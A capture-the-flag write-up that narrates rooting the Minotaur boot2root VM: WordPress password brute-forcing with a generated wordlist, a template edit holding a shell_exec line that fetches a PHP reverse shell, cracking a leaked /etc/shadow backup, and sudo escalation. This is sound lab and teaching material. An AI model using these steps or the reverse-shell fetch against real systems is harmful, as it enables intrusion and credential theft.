Mess with the Bull, Get the Horn

Time to catch up with the Sectalks CTF’s. First up, Minotaur (Sectalks BNE0x00)

"== Minotaur CTF ==

Minotaur is a boot2root CTF. Once you load the VM, treat it as a machine you can see on the network, i.e. you don't have physical access to this machine. Therefore, tricks like editing the VM's BIOS or Grub configuration are not allowed. Only remote attacks are permitted. There are a few flag.txt files around to grab. /root/flag.txt is your ultimate goal."

Let’s get hacking! First up, where is Minotaur hiding? Usually I would run arp or netdiscover to find the victim, however it’s not broadcasting that I can see. Let’s try ping sweeping:

Gotcha! What ports are open?

Let’s start with the low hanging fruit.. port 80.


Default apache page. Time to break open the fuzz….

Looks like we have a webapp at /bull. Let’s take a look:


Ummm… “Bulls are majestic animals. Such muscular beasts make me quiver.” Ummm… yeh…. whatever floats your boat ;)

What gets me excited about the page is this: “Proudly powered by WordPress”. Time to scan for known WP vulnerabilities. I have removed the vuln descriptions to keep the output short..

Plenty of vulnerabilities to check out, but first let’s see if we can go the easy route by bruteforcing bully’s password:

I cancelled this bruteforce attempt as the dictionary attack was going to take far too long. Looking at the CTF notes, we have these hints:

== Hints ==

This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.

Let’s try generating our own dictionary file based on the website’s content:

Take two.. this time with a much smaller wordlist.

Still no joy.. this is bullshit. ;) Let’s use john to mangle our dictionary file:

Third try at brute forcing:

Much better! We now have a log on to the WordPress site. Let’s see if we have edit privileges to the main index template:


We most certainly do. Time to add some exec code to download our PHP reverse shell.

shell_exec("wget ; mv phpshell.txt phpshell.php");

After updating the index template, we set up a simple netcat listener on port 1337, visit the index page to upload our shell, and execute the shell by visiting

w00t! First shell!

Taking a look at www-data’s default directory, we can see our first flag.txt!

Next step.. let’s go to /tmp and download a simple script for automated enumeration. We can let this script run in the background while we search for unique or custom hacks.

Hang on a second! What do we have here?

A second flag and a backup of the /etc/shadow file. It doesn’t get much better than this. Let’s use unshadow to generate our hash file, and pass it into john to see if we can get any creds:

After about one minute, we get heffer’s password. Let’s log on and see what we have:

Another flag! This time heffer’s:

First thing I always do is check if a user has sudo access, but in this case heffer has nothing exciting. I spend a couple of minutes pottering around the file system, only to be interrupted by john finding a second password. This time, minotaur’s. Let’s see what minotaur has to offer:

Minotaur’s flag!

Let’s check if minotaur has any sudo privileges:

ALL : ALL… hello! Today is our lucky day.

We have rooted the minotaur! Let’s raise the flag…

Thanks Bull for a fun challenge and for helping to get the Brisbane SecTalks off the ground.

Until next time, tight lines and happy hacking.